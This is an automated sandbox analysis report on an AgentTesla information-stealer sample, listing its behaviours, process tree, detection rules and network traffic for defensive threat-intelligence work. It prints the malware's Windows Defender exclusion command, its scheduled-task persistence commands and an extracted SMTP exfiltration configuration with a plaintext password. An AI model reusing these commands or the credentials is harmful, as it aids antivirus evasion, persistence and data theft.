Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SMBKT-20242005.exe

Overview

General Information

Sample name:SMBKT-20242005.exe
Analysis ID:1444949
MD5:52cd4c12a51d55526ceaa5f1e7f9e549
SHA1:6ca86a42d595177b554b82b5ea3a8dd40d1c3280
SHA256:c501ebcf488c9172ef490e70c37adb5926783f3aac132e8ff58f90b6b3232e03
Tags:AgentTeslaexe
Infos:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Yara detected AgentTesla
Yara detected AntiVM3
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Contains functionality to log keystrokes (.Net Source)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Outbound SMTP Connections
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • SMBKT-20242005.exe (PID: 7376 cmdline: "C:\Users\user\Desktop\SMBKT-20242005.exe" MD5: 52CD4C12A51D55526CEAA5F1E7F9E549)
    • powershell.exe (PID: 7600 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7888 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7616 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7640 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7756 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 7764 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • joUXSCpr.exe (PID: 7852 cmdline: C:\Users\user\AppData\Roaming\joUXSCpr.exe MD5: 52CD4C12A51D55526CEAA5F1E7F9E549)
    • schtasks.exe (PID: 8016 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 8076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8084 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
    • RegSvcs.exe (PID: 8092 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.stilbo.eu", "Username": "stilbogdan@stilbo.eu", "Password": "StilBO_#1"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        0000000F.00000002.2663210822.000000000310F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          0000000F.00000002.2663210822.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            Click to see the 15 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.RegSvcs.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                8.2.RegSvcs.exe.400000.0.unpackINDICATOR_SUSPICIOUS_EXE_VaultSchemaGUIDDetects executables referencing Windows vault credential objects. Observed in infostealersditekSHen
                • 0x33701:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5
                • 0x33773:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55
                • 0x337fd:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F
                • 0x3388f:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28
                • 0x338f9:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29
                • 0x3396b:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC
                • 0x33a01:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
                • 0x33a91:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
                1.2.SMBKT-20242005.exe.3e57898.5.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  1.2.SMBKT-20242005.exe.3e57898.5.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                    Click to see the 13 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", ProcessId: 7600, ProcessName: powershell.exe
                    Sigma detected: Powershell Defender Exclusion
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", ProcessId: 7600, ProcessName: powershell.exe
                    Sigma detected: Suspicious Add Scheduled Task Parent
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\joUXSCpr.exe, ParentImage: C:\Users\user\AppData\Roaming\joUXSCpr.exe, ParentProcessId: 7852, ParentProcessName: joUXSCpr.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp1263.tmp", ProcessId: 8016, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Outbound SMTP Connections
                    Source: Network ConnectionAuthor: frack113: Data: DesusertionIp: 212.44.102.65, DesusertionIsIpv6: false, DesusertionPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe, Initiated: true, ProcessId: 7764, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 49712
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", ProcessId: 7616, ProcessName: schtasks.exe
                    Sigma detected: Non Interactive PowerShell Process Spawned
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\joUXSCpr.exe", ProcessId: 7600, ProcessName: powershell.exe

                    Persistence and Installation Behavior

                    barindex
                    Sigma detected: Scheduled temp file as task from temp location
                    Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\SMBKT-20242005.exe", ParentImage: C:\Users\user\Desktop\SMBKT-20242005.exe, ParentProcessId: 7376, ParentProcessName: SMBKT-20242005.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\joUXSCpr" /XML "C:\Users\user\AppData\Local\Temp\tmp6AB.tmp", ProcessId: 7616, ProcessName: schtasks.exe

                    Snort Signatures

                    No Snort rule has matched

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Found malware configuration
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.stilbo.eu", "Username": "stilbogdan@stilbo.eu", "Password": "StilBO_#1"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeReversingLabs: Detection: 36%
                    Multi AV Scanner detection for submitted file
                    Source: SMBKT-20242005.exeReversingLabs: Detection: 36%
                    Machine Learning detection for dropped file
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: SMBKT-20242005.exeJoe Sandbox ML: detected
                    Source: SMBKT-20242005.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49713 version: TLS 1.2
                    Source: SMBKT-20242005.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 4x nop then jmp 04DF60D5h1_2_04DF6599
                    Source: C:\Users\user\AppData\Roaming\joUXSCpr.exeCode function: 4x nop then jmp 04CB5365h9_2_04CB5829
                    Source: global trafficTCP traffic: 192.168.2.9:49712 -> 212.44.102.65:587
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewIP Address: 104.26.13.205 104.26.13.205
                    Source: Joe Sandbox ViewASN Name: DHH-ASSI DHH-ASSI
                    Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: unknownDNS query: name: api.ipify.org
                    Source: global trafficTCP traffic: 192.168.2.9:49712 -> 212.44.102.65:587
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                    Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                    Source: global trafficDNS traffic detected: DNS query: mail.stilbo.eu
                    Source: SMBKT-20242005.exe, joUXSCpr.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                    Source: SMBKT-20242005.exe, joUXSCpr.exe.1.drString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
                    Source: RegSvcs.exe, 00000008.00000002.1477888050.0000000006510000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mS
                    Source: RegSvcs.exe, 00000008.00000002.1473242520.000000000338C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.00000000030FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://mail.stilbo.eu
                    Source: SMBKT-20242005.exe, joUXSCpr.exe.1.drString found in binary or memory: http://ocsp.comodoca.com0
                    Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.i.lencr.org/0
                    Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://r3.o.lencr.org0
                    Source: SMBKT-20242005.exe, 00000001.00000002.1461356615.0000000002DF6000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, joUXSCpr.exe, 00000009.00000002.1492085386.0000000002C31000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                    Source: RegSvcs.exe, 0000000F.00000002.2661521200.000000000128A000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2660788327.00000000011E9000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2669844639.00000000064C2000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.0000000003104000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                    Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://account.dyn.com/
                    Source: SMBKT-20242005.exe, 00000001.00000002.1462365494.0000000003D79000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.1470694828.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
                    Source: RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/
                    Source: RegSvcs.exe, 00000008.00000002.1473242520.0000000003311000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000F.00000002.2663210822.000000000308C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/t
                    Source: SMBKT-20242005.exe, joUXSCpr.exe.1.drString found in binary or memory: https://t3.ftcdn.net/jpg/02/48/42/64/360_F_248426448_NVKLywWqArG2ADUxDq6QprtIzsF82dMF.jpgG
                    Source: SMBKT-20242005.exe, joUXSCpr.exe.1.drString found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49710 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 104.26.13.205:443 -> 192.168.2.9:49713 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Contains functionality to log keystrokes (.Net Source)
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, gmBpn1ecBmQ.cs.Net Code: bBjS

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.SMBKT-20242005.exe.3e57898.5.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.SMBKT-20242005.exe.3e57898.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.SMBKT-20242005.exe.3d79970.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    Source: 1.2.SMBKT-20242005.exe.3e1cc78.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
                    .NET source code contains very large array initializations
                    Source: SMBKT-20242005.exe, Marca.csLarge array initialization: : array initializer size 683637
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_0137DFAC1_2_0137DFAC
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE31D01_2_04DE31D0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE92D01_2_04DE92D0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE2D381_2_04DE2D38
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE74181_2_04DE7418
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE00401_2_04DE0040
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE00071_2_04DE0007
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE315D1_2_04DE315D
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE31481_2_04DE3148
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE92C01_2_04DE92C0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE43F81_2_04DE43F8
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE8D101_2_04DE8D10
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE2D291_2_04DE2D29
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE8D201_2_04DE8D20
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE9E511_2_04DE9E51
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DE9E601_2_04DE9E60
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DF80D91_2_04DF80D9
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DFA4581_2_04DFA458
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DF04781_2_04DF0478
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DF26281_2_04DF2628
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DF00401_2_04DF0040
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_04DF08B01_2_04DF08B0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9B8401_2_08E9B840
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9A9481_2_08E9A948
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E925581_2_08E92558
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DEB01_2_08E9DEB0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E99FE81_2_08E99FE8
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E997B01_2_08E997B0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9D8881_2_08E9D888
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9D8791_2_08E9D879
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9B8281_2_08E9B828
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9B8301_2_08E9B830
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9A9391_2_08E9A939
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DA611_2_08E9DA61
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DA701_2_08E9DA70
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9D2111_2_08E9D211
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9D4E91_2_08E9D4E9
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DCCD1_2_08E9DCCD
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9DCD01_2_08E9DCD0
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E9A4681_2_08E9A468
                    Source: C:\Users\user\Desktop\SMBKT-20242005.exeCode function: 1_2_08E98C481_2_08E98C48
